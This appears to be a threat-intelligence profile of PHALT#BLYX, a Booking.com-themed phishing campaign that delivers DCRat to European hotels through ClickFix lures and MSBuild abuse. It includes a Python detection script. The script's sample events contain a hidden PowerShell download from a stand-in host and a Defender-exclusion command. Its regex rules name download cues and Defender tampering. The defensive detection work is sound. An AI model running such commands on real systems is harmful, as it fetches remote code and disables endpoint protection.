PHALT#BLYX
PHALT#BLYX is a malware campaign (tracked threat activity) identified by Securonix that primarily targets the European hospitality sector, including hotels, using phishing emails themed as Booking.com reservation cancellations. The operation uses a social-engineering variant of ClickFix: victims are led through a fake CAPTCHA and a fake Windows Blue Screen of Death prompt and are induced to execute malicious PowerShell commands manually.

The infection chain downloads a project file and abuses trusted Windows binaries, particularly MSBuild.exe, to compile and execute a heavily obfuscated DCRat (Dark Crystal RAT) payload. Researchers also observed payload injection into legitimate processes such as aspnet_compiler.exe and aggressive tampering with Windows Defender exclusions. Reported DCRat capabilities in this campaign include remote access, persistence, process hollowing, keylogging, screenshot capture, clipboard monitoring, system reconnaissance, remote command execution, and delivery of secondary payloads.

Securonix reported that the chain evolved over several months, from simpler HTML Application (HTA) methods to MSBuild-based execution, to improve evasion. The campaign appears tailored to European targets, with euro-denominated charges in the lures and timing around the holiday season. Securonix assessed the activity as Russia-linked or likely operated by Russian-speaking actors, based on Russian-language artifacts and the use of DCRat, which was created by a Russian developer and is widely traded on Russian underground forums. No additional aliases or sub-groups have been identified in the source reporting.
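The chain summarized above leaves a recognizable trail in process-creation telemetry: a manually pasted PowerShell command, MSBuild.exe compiling a project file from a user-writable path, aspnet_compiler.exe appearing under an unexpected parent, and Windows Defender exclusions being added from the command line. The following is an added detection example, not code from Securonix or from Mallory. It runs four simple rules over constructed events shaped like Sysmon Event ID 1 records; every path, command line and parent/child relationship in the sample data is illustrative (the ClickFix parentage via explorer.exe, and the set of "legitimate" MSBuild parents, are assumptions to tune per environment), and none of it is an IoC from the report.

```python
import re
from dataclasses import dataclass
from typing import Dict, List


@dataclass(frozen=True)
class Finding:
    rule: str          # which rule fired
    event_index: int   # position of the event in the input list
    detail: str        # the command line that triggered it


# Constructed sample events (Sysmon Event ID 1 style). Values are made up for
# illustration; they are not indicators from the PHALT#BLYX reporting.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {   # user pastes a ClickFix command into the Run dialog (assumed explorer.exe parent)
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "ParentImage": r"C:\Windows\explorer.exe",
        "CommandLine": r'powershell -w hidden -c "iwr http://placeholder.invalid/x.proj -o $env:TEMP\x.proj"',
    },
    {   # MSBuild compiles a project file dropped in %TEMP%, spawned by PowerShell
        "Image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe",
        "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": r"MSBuild.exe C:\Users\u\AppData\Local\Temp\x.proj",
    },
    {   # aspnet_compiler.exe started by MSBuild (assumed hollowing target, per the report)
        "Image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe",
        "ParentImage": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe",
        "CommandLine": r"aspnet_compiler.exe",
    },
    {   # Defender exclusion added from the command line
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": r'powershell -c "Add-MpPreference -ExclusionPath $env:TEMP"',
    },
    {   # benign: Visual Studio building a project (should not fire)
        "Image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe",
        "ParentImage": r"C:\Program Files\Microsoft Visual Studio\Common7\IDE\devenv.exe",
        "CommandLine": r"MSBuild.exe C:\src\MyApp\MyApp.csproj /t:Build",
    },
]

# Parents under which MSBuild.exe is expected in a developer environment (assumption; tune locally).
BUILD_PARENTS = {"devenv.exe", "dotnet.exe", "msbuild.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}

PS_DOWNLOAD_CUES = re.compile(
    r"(?i)(iwr\b|invoke-webrequest|downloadstring|downloadfile|-encodedcommand|-enc\b)")
PROJECT_FILE = re.compile(r"(?i)\.(proj|csproj|vbproj|xml)\b")
DEFENDER_TAMPER = re.compile(
    r"(?i)\b(add|set)-mppreference\b.*?-(exclusion(path|process|extension|ipaddress)"
    r"|disablerealtimemonitoring)\b")


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def detect(events: List[Dict[str, str]]) -> List[Finding]:
    """Apply the four PHALT#BLYX-style rules to process-creation events."""
    findings: List[Finding] = []
    for i, ev in enumerate(events):
        img, parent, cmd = basename(ev["Image"]), basename(ev["ParentImage"]), ev["CommandLine"]

        # Rule 1: PowerShell launched from the shell with download/encoding cues (ClickFix paste).
        if img in POWERSHELL and parent == "explorer.exe" and PS_DOWNLOAD_CUES.search(cmd):
            findings.append(Finding("clickfix_powershell_from_explorer", i, cmd))

        # Rule 2: MSBuild given a project file by something other than a build tool.
        if img == "msbuild.exe" and PROJECT_FILE.search(cmd) and parent not in BUILD_PARENTS:
            findings.append(Finding("msbuild_proxy_compile", i, cmd))

        # Rule 3: aspnet_compiler.exe under MSBuild/PowerShell (unusual outside a build pipeline).
        if img == "aspnet_compiler.exe" and parent in BUILD_PARENTS | POWERSHELL:
            findings.append(Finding("aspnet_compiler_suspicious_parent", i, cmd))

        # Rule 4: Defender exclusion or real-time protection tampering via MpPreference cmdlets.
        if DEFENDER_TAMPER.search(cmd):
            findings.append(Finding("defender_exclusion_tamper", i, cmd))
    return findings


def rule_counts(events: List[Dict[str, str]]) -> Dict[str, int]:
    """Count findings per rule, handy for a quick triage summary."""
    counts: Dict[str, int] = {}
    for f in detect(events):
        counts[f.rule] = counts.get(f.rule, 0) + 1
    return counts


if __name__ == "__main__":
    for f in detect(SAMPLE_EVENTS):
        print(f"[{f.rule}] event #{f.event_index}: {f.detail}")
```

Each rule maps to one stage of the reported chain, so a single host producing hits from several of them in sequence is a much stronger signal than any one rule on its own; the benign devenv.exe build in the sample data shows why the MSBuild rule keys on the parent rather than on MSBuild.exe alone.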
Targeting
Who, where, and (when attributed) which flag flies behind the operation. Pulled from open-source reporting and Mallory's analyst review.
Who they target
Sectors the actor has been observed targeting.
- hospitality
Recent activity
4 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
PHALT#BLYX is a malware campaign targeting the European hospitality sector using phishing emails, fake system crash screens, and abuse of Windows build tools to deploy remote access trojans.
PHALT#BLYX is a Russia-linked threat actor group conducting a malware campaign targeting European hospitality organizations. They use phishing emails mimicking Booking.com to trick hotel staff into executing malicious PowerShell commands, resulting in remote access trojan installation and ongoing system compromise.
PHALT#BLYX is conducting a malware campaign targeting European hospitality organizations, using phishing emails that mimic Booking.com to trick staff into executing malicious PowerShell commands, resulting in remote access trojan installation.
A ClickFix-style social engineering campaign targeting the hospitality sector (Booking.com-themed reservation cancellation lures) that coerces victims into running malicious PowerShell, abuses MSBuild.exe to compile and execute payloads, and ultimately deploys an obfuscated DCRat payload with capabilities including process hollowing, keylogging, persistence, and secondary payload delivery.